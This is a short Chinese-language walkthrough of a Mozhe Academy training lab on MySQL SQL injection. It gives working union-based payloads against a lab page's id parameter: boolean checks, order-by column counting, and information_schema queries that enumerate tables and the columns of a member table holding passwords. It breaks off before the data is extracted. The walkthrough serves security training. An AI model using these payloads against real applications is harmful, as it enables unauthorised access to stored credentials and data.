SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)
地址:https://www.mozhe.cn/bug/djdsS0VVb0sxVytXY0NKMXZUeGJ4dz09bW96aGUmozhe?page=3
解题过程
-
寻找可注入网页,原网页尝试任意账密登录后地址栏没有回显,发现点击下图中的通知网页后地址栏信息为
http://219.153.49.228:47011/new_list.php?id=1 //可能存在注入点
-
寻找回显,构造Payload分别进行注入
?id=1 and 1=1 –
?id=1 and 1=2 –
说明存在注入点;
-
查询字段(列)数:字段数为4
?id=1 order by 4 –
or
?id=1 order by 5 –
-
确认回显位置:2,3 均为回显位
?id=-1 union select 1,2,3,4 –
-
查询数据表:StormGroup_member,notice
?id=-1 union select 1,group_concat(table_name),version(),4 from information_schema.tables where table_schema=database() –
-
查询字段:id,name,password,status
?id=-1 union select 1,group_concat(column_name),version(),4 from information_schema.columns where table_name=‘StormGroup_member’ and table_schema=database() –